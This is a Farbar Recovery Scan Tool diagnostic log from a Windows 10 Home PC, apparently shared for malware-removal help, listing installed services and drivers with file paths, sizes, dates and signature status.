U3 PhoneSvc; C:\WINDOWS\System32\PhoneService.dll [781824 2016-09-27] (Microsoft Corporation) [File not signed]
U3 PimIndexMaintenanceSvc; C:\WINDOWS\System32\PimIndexMaintenance.dll [203264 2017-03-04] (Microsoft Corporation) [File not signed]
U3 pla; C:\WINDOWS\system32\pla.dll [1457152 2016-07-16] (Microsoft Corporation) [File not signed]
U3 pla; C:\WINDOWS\SysWOW64\pla.dll [1536512 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PlugPlay; C:\WINDOWS\system32\umpnpmgr.dll [111104 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PNRPAutoReg; C:\WINDOWS\system32\pnrpauto.dll [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PNRPsvc; C:\WINDOWS\system32\pnrpsvc.dll [345088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PolicyAgent; C:\WINDOWS\System32\ipsecsvc.dll [391168 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Power; C:\WINDOWS\system32\umpo.dll [123904 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PrintNotify; C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll [3318784 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ProfSvc; C:\WINDOWS\system32\profsvc.dll [358400 2016-09-15] (Microsoft Corporation) [File not signed]
U3 QWAVE; C:\WINDOWS\system32\qwave.dll [275456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 QWAVE; C:\WINDOWS\SysWOW64\qwave.dll [234496 2016-07-16] (Microsoft Corporation) [File not signed]
S3 RasAuto; C:\WINDOWS\System32\rasauto.dll [105472 2016-07-16] (Microsoft Corporation) [File not signed]
S3 RasMan; C:\WINDOWS\System32\rasmans.dll [658432 2017-03-04] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\WINDOWS\System32\mprdim.dll [496128 2016-09-15] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\WINDOWS\SysWOW64\mprdim.dll [431104 2016-09-15] (Microsoft Corporation) [File not signed]
U4 RemoteRegistry; C:\WINDOWS\system32\regsvc.dll [155648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RetailDemo; C:\WINDOWS\system32\RDXService.dll [650752 2017-03-04] (Microsoft Corporation) [File not signed]
U3 RmSvc; C:\WINDOWS\System32\RMapi.dll [140800 2016-09-15] (Microsoft Corporation) [File not signed]
R2 RpcEptMapper; C:\WINDOWS\System32\RpcEpMap.dll [79360 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RpcLocator; C:\WINDOWS\system32\locator.exe [11264 2016-07-16] (Microsoft Corporation) [File not signed]
R2 RpcSs; C:\WINDOWS\system32\rpcss.dll [888320 2016-07-16] (Microsoft Corporation) [File not signed]
U4 SCardSvr; C:\WINDOWS\System32\SCardSvr.dll [250880 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ScDeviceEnum; C:\WINDOWS\System32\ScDeviceEnum.dll [201728 2016-12-14] (Microsoft Corporation) [File not signed]
U2 Schedule; C:\WINDOWS\system32\schedsvc.dll [948224 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SCPolicySvc; C:\WINDOWS\System32\certprop.dll [193536 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SDRSVC; C:\WINDOWS\System32\SDRSVC.dll [147968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 seclogon; C:\WINDOWS\system32\seclogon.dll [31232 2016-07-16] (Microsoft Corporation) [File not signed]
R2 SENS; C:\WINDOWS\System32\sens.dll [70656 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SensorDataService; C:\WINDOWS\System32\SensorDataService.exe [1312768 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SensorService; C:\WINDOWS\system32\SensorService.dll [417792 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SensrSvc; C:\WINDOWS\system32\sensrsvc.dll [179200 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SessionEnv; C:\WINDOWS\system32\sessenv.dll [387072 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SessionEnv; C:\WINDOWS\SysWOW64\sessenv.dll [331776 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SharedAccess; C:\WINDOWS\System32\ipnathlp.dll [541696 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ShellHWDetection; C:\WINDOWS\System32\shsvcs.dll [617472 2016-07-16] (Microsoft Corporation) [File not signed]
U2 ShellHWDetection; C:\WINDOWS\SysWOW64\shsvcs.dll [566784 2016-07-16] (Microsoft Corporation) [File not signed]
U4 shpamsvc; C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll [161792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 smphost; C:\WINDOWS\System32\smphost.dll [23552 2016-08-06] (Microsoft Corporation) [File not signed]
U3 smphost; C:\WINDOWS\SysWOW64\smphost.dll [20992 2016-08-06] (Microsoft Corporation) [File not signed]
U3 SmsRouter; C:\WINDOWS\system32\SmsRouterSvc.dll [590848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SNMPTRAP; C:\WINDOWS\System32\snmptrap.exe [15872 2016-07-16] (Microsoft Corporation) [File not signed]
R2 Spooler; C:\WINDOWS\System32\spoolsv.exe [792576 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SSDPSRV; C:\WINDOWS\System32\ssdpsrv.dll [236544 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SstpSvc; C:\WINDOWS\system32\sstpsvc.dll [209920 2016-07-16] (Microsoft Corporation) [File not signed]
U3 StateRepository; C:\WINDOWS\system32\windows.staterepository.dll [4136448 2016-11-11] (Microsoft Corporation) [File not signed]
U3 StateRepository; C:\WINDOWS\SysWOW64\windows.staterepository.dll [3370496 2016-11-11] (Microsoft Corporation) [File not signed]
U2 stisvc; C:\WINDOWS\System32\wiaservc.dll [646656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 StorSvc; C:\WINDOWS\system32\storsvc.dll [396800 2016-11-11] (Microsoft Corporation) [File not signed]
U3 svsvc; C:\WINDOWS\system32\svsvc.dll [13824 2016-07-16] (Microsoft Corporation) [File not signed]
U3 swprv; C:\WINDOWS\System32\swprv.dll [467456 2016-07-16] (Microsoft Corporation) [File not signed]
U4 SysMain; C:\WINDOWS\system32\sysmain.dll [944128 2016-07-16] (Microsoft Corporation) [File not signed]
U2 SystemEventsBroker; C:\WINDOWS\System32\SystemEventsBrokerServer.dll [387072 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TabletInputService; C:\WINDOWS\System32\TabSvc.dll [148992 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TapiSrv; C:\WINDOWS\System32\tapisrv.dll [309248 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TapiSrv; C:\WINDOWS\SysWOW64\tapisrv.dll [254976 2016-07-16] (Microsoft Corporation) [File not signed]
S3 TermService; C:\WINDOWS\System32\termsrv.dll [987648 2016-07-16] (Microsoft Corporation) [File not signed]
R2 Themes; C:\WINDOWS\system32\themeservice.dll [70656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TieringEngineService; C:\WINDOWS\system32\TieringEngineService.exe [287744 2016-07-16] (Microsoft Corporation) [File not signed]
U2 tiledatamodelsvc; C:\WINDOWS\system32\tileobjserver.dll [574976 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TimeBrokerSvc; C:\WINDOWS\System32\TimeBrokerServer.dll [177664 2016-07-16] (Microsoft Corporation) [File not signed]
U2 TrkWks; C:\WINDOWS\System32\trkwks.dll [116736 2016-07-16] (Microsoft Corporation) [File not signed]
S3 TrustedInstaller; C:\WINDOWS\servicing\TrustedInstaller.exe [122880 2016-11-11] (Microsoft Corporation) [File not signed]
U4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [809424 2015-10-27] (Tunngle.net GmbH) [File not signed]
U4 tzautoupdate; C:\WINDOWS\system32\tzautoupdate.dll [95232 2017-03-04] (Microsoft Corporation) [File not signed]
U3 UI0Detect; C:\WINDOWS\system32\UI0Detect.exe [42496 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UmRdpService; C:\WINDOWS\System32\umrdp.dll [273408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UnistoreSvc; C:\WINDOWS\System32\unistore.dll [1184256 2017-03-04] (Microsoft Corporation) [File not signed]
U3 UnistoreSvc; C:\WINDOWS\SysWOW64\unistore.dll [968704 2017-03-04] (Microsoft Corporation) [File not signed]
U3 upnphost; C:\WINDOWS\System32\upnphost.dll [440832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 upnphost; C:\WINDOWS\SysWOW64\upnphost.dll [328192 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UserDataSvc; C:\WINDOWS\System32\userdataservice.dll [1512448 2017-03-04] (Microsoft Corporation) [File not signed]
U2 UserManager; C:\WINDOWS\System32\usermgr.dll [1020928 2016-09-15] (Microsoft Corporation) [File not signed]
U3 UsoSvc; C:\WINDOWS\system32\usocore.dll [548864 2017-03-04] (Microsoft Corporation) [File not signed]
U3 VaultSvc; C:\Windows\System32\vaultsvc.dll [358912 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vds; C:\WINDOWS\System32\vds.exe [649216 2017-03-04] (Microsoft Corporation) [File not signed]
U3 vmicguestinterface; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicheartbeat; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmickvpexchange; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicrdv; C:\WINDOWS\System32\icsvcext.dll [349696 2017-03-04] (Microsoft Corporation) [File not signed]
U3 vmicshutdown; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmictimesync; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicvmsession; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicvss; C:\WINDOWS\System32\icsvcext.dll [349696 2017-03-04] (Microsoft Corporation) [File not signed]
U3 VSS; C:\WINDOWS\system32\vssvc.exe [1443328 2017-03-04] (Microsoft Corporation) [File not signed]
U3 W32Time; C:\WINDOWS\system32\w32time.dll [520192 2016-09-27] (Microsoft Corporation) [File not signed]
U3 WalletService; C:\WINDOWS\system32\WalletService.dll [436224 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wbengine; C:\WINDOWS\system32\wbengine.exe [1547264 2017-03-04] (Microsoft Corporation) [File not signed]
U2 WbioSrvc; C:\WINDOWS\System32\wbiosrvc.dll [837632 2016-12-14] (Microsoft Corporation) [File not signed]
U2 Wcmsvc; C:\WINDOWS\System32\wcmsvc.dll [715776 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wcncsvc; C:\WINDOWS\System32\wcncsvc.dll [468992 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiServiceHost; C:\WINDOWS\system32\wdi.dll [97792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiServiceHost; C:\WINDOWS\SysWOW64\wdi.dll [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiSystemHost; C:\WINDOWS\system32\wdi.dll [97792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiSystemHost; C:\WINDOWS\SysWOW64\wdi.dll [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
U3 WebClient; C:\WINDOWS\System32\webclnt.dll [227328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WebClient; C:\WINDOWS\SysWOW64\webclnt.dll [198656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Wecsvc; C:\WINDOWS\system32\wecsvc.dll [206848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WEPHOSTSVC; C:\WINDOWS\system32\wephostsvc.dll [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wercplsupport; C:\WINDOWS\System32\wercplsupport.dll [94208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WerSvc; C:\WINDOWS\System32\WerSvc.dll [156672 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WiaRpc; C:\WINDOWS\System32\wiarpc.dll [82944 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103712 2017-03-04] (Microsoft Corporation)
U3 WinHttpAutoProxySvc; C:\WINDOWS\system32\winhttp.dll [818176 2017-03-04] (Microsoft Corporation) [File not signed]
U3 WinHttpAutoProxySvc; C:\WINDOWS\SysWOW64\winhttp.dll [636928 2017-03-04] (Microsoft Corporation) [File not signed]
U2 Winmgmt; C:\WINDOWS\system32\wbem\WMIsvc.dll [222720 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WinRM; C:\WINDOWS\system32\WsmSvc.dll [2716672 2016-11-11] (Microsoft Corporation) [File not signed]
U3 WinRM; C:\WINDOWS\SysWOW64\WsmSvc.dll [2333184 2016-11-11] (Microsoft Corporation) [File not signed]
U3 wisvc; C:\WINDOWS\system32\flightsettings.dll [635904 2017-03-04] (Microsoft Corporation) [File not signed]
U4 WkSvw32.exe; C:\Program Files (x86)\WIBUKEY\Server\WkSvw32.exe [659336 2013-12-18] (WIBU-SYSTEMS AG)
U3 WlanSvc; C:\WINDOWS\System32\wlansvc.dll [2370048 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wlidsvc; C:\WINDOWS\system32\wlidsvc.dll [2104320 2016-11-11] (Microsoft Corporation) [File not signed]
U3 wmiApSrv; C:\WINDOWS\system32\wbem\WmiApSrv.exe [203264 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WMPNetworkSvc; C:\Program Files\Windows Media Player\wmpnetwk.exe [1184256 2016-09-27] (Microsoft Corporation) [File not signed]
U3 workfolderssvc; C:\WINDOWS\system32\workfolderssvc.dll [1837056 2017-03-04] (Microsoft Corporation) [File not signed]
U3 WPDBusEnum; C:\WINDOWS\system32\wpdbusenum.dll [88064 2016-07-16] (Microsoft Corporation) [File not signed]
U2 WpnService; C:\WINDOWS\system32\WpnService.dll [234496 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WpnUserService; C:\WINDOWS\System32\WpnUserService.dll [74240 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wscsvc; C:\WINDOWS\System32\wscsvc.dll [184832 2016-11-11] (Microsoft Corporation) [File not signed]
U4 WSearch; C:\WINDOWS\system32\SearchIndexer.exe [903680 2017-03-04] (Microsoft Corporation) [File not signed]
U4 WSearch; C:\WINDOWS\SysWOW64\SearchIndexer.exe [773120 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wuauserv; C:\WINDOWS\system32\wuaueng.dll [2317824 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wudfsvc; C:\WINDOWS\System32\WUDFSvc.dll [99840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WwanSvc; C:\WINDOWS\System32\wwansvc.dll [1282048 2017-03-04] (Microsoft Corporation) [File not signed]
U3 XblAuthManager; C:\WINDOWS\System32\XblAuthManager.dll [1016320 2017-03-04] (Microsoft Corporation) [File not signed]
U3 XblGameSave; C:\WINDOWS\System32\XblGameSave.dll [1159680 2016-07-16] (Microsoft Corporation) [File not signed]
U3 XboxNetApiSvc; C:\WINDOWS\system32\XboxNetApiSvc.dll [1025536 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ZAMSvc; C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14471408 2017-03-06] (Copyright 2017.)
U2 NVIDIA Wireless Controller Service; "C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe" [X]
U3 OverwolfUpdater; "C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe" /RunningFrom SCM" [X]
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
U3 1394ohci; C:\WINDOWS\System32\drivers\1394ohci.sys [235520 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AcpiDev; C:\WINDOWS\System32\drivers\AcpiDev.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U3 acpipagr; C:\WINDOWS\System32\drivers\acpipagr.sys [12288 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AcpiPmi; C:\WINDOWS\System32\drivers\acpipmi.sys [14336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 acpitime; C:\WINDOWS\System32\drivers\acpitime.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ahcache; C:\WINDOWS\System32\DRIVERS\ahcache.sys [227328 2016-10-15] (Microsoft Corporation) [File not signed]
U3 AmdK8; C:\WINDOWS\System32\drivers\amdk8.sys [123392 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AmdPPM; C:\WINDOWS\System32\drivers\amdppm.sys [120832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 applockerfltr; C:\WINDOWS\System32\drivers\applockerfltr.sys [15360 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AsyncMac; C:\WINDOWS\System32\drivers\asyncmac.sys [28160 2016-07-16] (Microsoft Corporation) [File not signed]
U1 BasicDisplay; C:\WINDOWS\System32\drivers\BasicDisplay.sys [56320 2016-07-16] (Microsoft Corporation) [File not signed]
U1 BasicRender; C:\WINDOWS\System32\drivers\BasicRender.sys [41472 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bcmfn; C:\WINDOWS\System32\drivers\bcmfn.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider) [File not signed]
U3 bcmfn2; C:\WINDOWS\System32\drivers\bcmfn2.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider) [File not signed]
U1 Beep; C:\Windows\System32\Drivers\Beep.sys [9728 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bowser; C:\WINDOWS\System32\DRIVERS\bowser.sys [101888 2016-11-02] (Microsoft Corporation) [File not signed]
U3 BthAvrcpTg; C:\WINDOWS\System32\drivers\BthAvrcpTg.sys [43008 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [65536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bthhfhid; C:\WINDOWS\System32\drivers\BthHFHid.sys [31232 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BTHMODEM; C:\WINDOWS\System32\drivers\bthmodem.sys [66048 2016-07-16] (Microsoft Corporation) [File not signed]
U3 buttonconverter; C:\WINDOWS\System32\drivers\buttonconverter.sys [38912 2016-07-16] (Microsoft Corporation) [File not signed]
U3 CapImg; C:\WINDOWS\System32\drivers\capimg.sys [118272 2016-09-10] (Microsoft Corporation) [File not signed]
U4 cdfs; C:\WINDOWS\System32\DRIVERS\cdfs.sys [92160 2016-07-16] (Microsoft Corporation) [File not signed]
U1 cdrom; C:\WINDOWS\System32\drivers\cdrom.sys [173056 2016-07-16] (Microsoft Corporation) [File not signed]
U3 circlass; C:\WINDOWS\System32\drivers\circlass.sys [48640 2016-07-16] (Microsoft Corporation) [File not signed]
U2 clreg; C:\WINDOWS\System32\drivers\registry.sys [70144 2016-07-16] (Microsoft Corporation) [File not signed]
U3 CmBatt; C:\WINDOWS\System32\drivers\CmBatt.sys [29696 2016-07-16] (Microsoft Corporation) [File not signed]
U1 cmderd; C:\WINDOWS\System32\DRIVERS\cmderd.sys [40952 2016-12-16] (COMODO)
U1 cmdGuard; C:\WINDOWS\System32\DRIVERS\cmdguard.sys [828360 2016-12-16] (COMODO)
U1 cmdhlp; C:\WINDOWS\system32\DRIVERS\cmdhlp.sys [50288 2016-12-16] (COMODO)
U3 CompositeBus; C:\WINDOWS\System32\DriverStore\FileRepository\compositebus.inf_amd64_a140581a8f8b58b7\CompositeBus.sys [39936 2016-07-16] (Microsoft Corporation) [File not signed]
U1 Dfsc; C:\WINDOWS\System32\Drivers\dfsc.sys [145408 2017-03-04] (Microsoft Corporation) [File not signed]
U3 dmvsc; C:\WINDOWS\System32\drivers\dmvsc.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2015-08-26] (Disc Soft Ltd)
U1 ElRawDisk; C:\Windows\system32\drivers\ElRawDsk.sys [30752 2013-12-03] (EldoS Corporation)
U3 ErrDev; C:\WINDOWS\System32\drivers\errdev.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77408 2017-02-24] ()
U3 exfat; C:\Windows\System32\Drivers\exfat.sys [334848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fdc; C:\WINDOWS\System32\drivers\fdc.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U1 FileCrypt; C:\WINDOWS\System32\drivers\filecrypt.sys [88576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Filetrace; C:\WINDOWS\System32\drivers\filetrace.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 flpydisk; C:\WINDOWS\System32\drivers\flpydisk.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 gencounter; C:\WINDOWS\System32\drivers\vmgencounter.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U3 genericusbfn; C:\WINDOWS\System32\drivers\genericusbfn.sys [20480 2016-07-16] (Microsoft Corporation) [File not signed]
U1 GpuEnergyDrv; C:\WINDOWS\System32\drivers\gpuenergydrv.sys [8192 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HDAudBus; C:\WINDOWS\System32\drivers\HDAudBus.sys [83456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidBth; C:\WINDOWS\System32\drivers\hidbth.sys [108032 2016-07-16] (Microsoft Corporation) [File not signed]
U3 hidi2c; C:\WINDOWS\System32\drivers\hidi2c.sys [51200 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidIr; C:\WINDOWS\System32\drivers\hidir.sys [46592 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidUsb; C:\WINDOWS\System32\drivers\hidusb.sys [38400 2016-09-27] (Microsoft Corporation) [File not signed]
U3 hyperkbd; C:\WINDOWS\System32\drivers\hyperkbd.sys [16384 2016-07-16] (Microsoft Corporation) [File not signed]
U3 i8042prt; C:\WINDOWS\System32\drivers\i8042prt.sys [114176 2016-07-16] (Microsoft Corporation) [File not signed]
U3 iagpio; C:\WINDOWS\System32\drivers\iagpio.sys [33280 2016-07-16] (Intel(R) Corporation) [File not signed]
U3 iai2c; C:\WINDOWS\System32\drivers\iai2c.sys [81408 2016-07-16] (Intel(R) Corporation) [File not signed]
U3 iaLPSS2i_GPIO2; C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [64512 2016-07-16] (Intel Corporation) [File not signed]
U3 iaLPSS2_UART2; C:\WINDOWS\System32\drivers\iaLPSS2_UART2.sys [273168 2015-05-04] (Intel Corporation)
U3 iaLPSSi_I2C; C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [113152 2016-07-16] (Intel Corporation) [File not signed]
U3 IndirectKmd; C:\WINDOWS\System32\drivers\IndirectKmd.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U1 inspect; C:\WINDOWS\system32\DRIVERS\inspect.sys [127144 2016-12-16] (COMODO)
U3 intelppm; C:\WINDOWS\System32\drivers\intelppm.sys [134144 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IpFilterDriver; C:\WINDOWS\System32\DRIVERS\ipfltdrv.sys [85504 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IPNAT; C:\WINDOWS\System32\drivers\ipnat.sys [212480 2016-07-16] (Microsoft Corporation) [File not signed]
U3 irda; C:\WINDOWS\system32\drivers\irda.sys [120320 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IRENUM; C:\WINDOWS\System32\drivers\irenum.sys [19456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 kbdhid; C:\WINDOWS\System32\drivers\kbdhid.sys [39424 2016-09-15] (Microsoft Corporation) [File not signed]
U3 kdnic; C:\WINDOWS\System32\drivers\kdnic.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ksthunk; C:\WINDOWS\system32\drivers\ksthunk.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U2 lltdio; C:\WINDOWS\System32\drivers\lltdio.sys [66048 2016-07-16] (Microsoft Corporation) [File not signed]
U2 luafv; C:\WINDOWS\system32\drivers\luafv.sys [125952 2016-07-16] (Microsoft Corporation) [File not signed]
U2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [186304 2017-03-15] (Malwarebytes)
U3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [111544 2017-03-15] (Malwarebytes)
U3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-03-15] (Malwarebytes)
U3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251840 2017-03-15] (Malwarebytes)
U3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [92088 2017-03-16] (Malwarebytes)
U2 MMCSS; C:\WINDOWS\system32\drivers\mmcss.sys [48128 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Modem; C:\WINDOWS\System32\drivers\modem.sys [42496 2016-11-11] (Microsoft Corporation) [File not signed]
U3 monitor; C:\WINDOWS\System32\drivers\monitor.sys [38400 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mouhid; C:\WINDOWS\System32\drivers\mouhid.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mpsdrv; C:\WINDOWS\System32\drivers\mpsdrv.sys [75776 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MRxDAV; C:\WINDOWS\system32\drivers\mrxdav.sys [143872 2016-10-05] (Microsoft Corporation) [File not signed]
U2 mrxsmb10; C:\WINDOWS\System32\DRIVERS\mrxsmb10.sys [282624 2016-11-11] (Microsoft Corporation) [File not signed]
U3 MsBridge; C:\WINDOWS\System32\drivers\bridge.sys [114688 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mshidkmdf; C:\WINDOWS\System32\drivers\mshidkmdf.sys [8704 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mshidumdf; C:\WINDOWS\System32\drivers\mshidumdf.sys [11776 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSKSSRV; C:\WINDOWS\system32\DRIVERS\MSKSSRV.sys [27136 2017-03-04] (Microsoft Corporation) [File not signed]
U2 MsLldp; C:\WINDOWS\System32\drivers\mslldp.sys [78336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSPCLOCK; C:\WINDOWS\system32\DRIVERS\MSPCLOCK.sys [10752 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSPQM; C:\WINDOWS\system32\DRIVERS\MSPQM.sys [10752 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSTEE; C:\WINDOWS\system32\DRIVERS\MSTEE.sys [12800 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MTConfig; C:\WINDOWS\System32\drivers\MTConfig.sys [15872 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NativeWifiP; C:\WINDOWS\System32\DRIVERS\nwifi.sys [535552 2017-03-04] (Microsoft Corporation) [File not signed]
U3 NdisCap; C:\WINDOWS\System32\drivers\ndiscap.sys [50176 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisImPlatform; C:\WINDOWS\System32\drivers\NdisImPlatform.sys [126464 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisTapi; C:\WINDOWS\System32\DRIVERS\ndistapi.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Ndisuio; C:\WINDOWS\System32\drivers\ndisuio.sys [63488 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisVirtualBus; C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [20480 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisWan; C:\WINDOWS\System32\drivers\ndiswan.sys [189440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ndiswanlegacy; C:\WINDOWS\System32\DRIVERS\ndiswan.sys [189440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ndproxy; C:\WINDOWS\System32\DRIVERS\NDProxy.sys [60928 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Ndu; C:\WINDOWS\System32\drivers\Ndu.sys [125440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] () [File not signed]
U1 NetBT; C:\WINDOWS\System32\DRIVERS\netbt.sys [279040 2016-07-16] (Microsoft Corporation) [File not signed]
U1 Npfs; C:\Windows\System32\Drivers\Npfs.sys [68608 2016-07-16] (Microsoft Corporation) [File not signed]
U1 npsvctrig; C:\WINDOWS\System32\drivers\npsvctrig.sys [26624 2016-07-16] (Microsoft Corporation) [File not signed]
Ran by Nekut (administrator) on DESKTOP-S3S217H (16-03-2017 16:46:58)
Running from C:\Users\Nekut\Desktop
Loaded Profiles: Nekut (Available Profiles: Nekut)
Platform: Windows 10 Home Version 1607 (X64) Language: Czech (Czech Republic)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
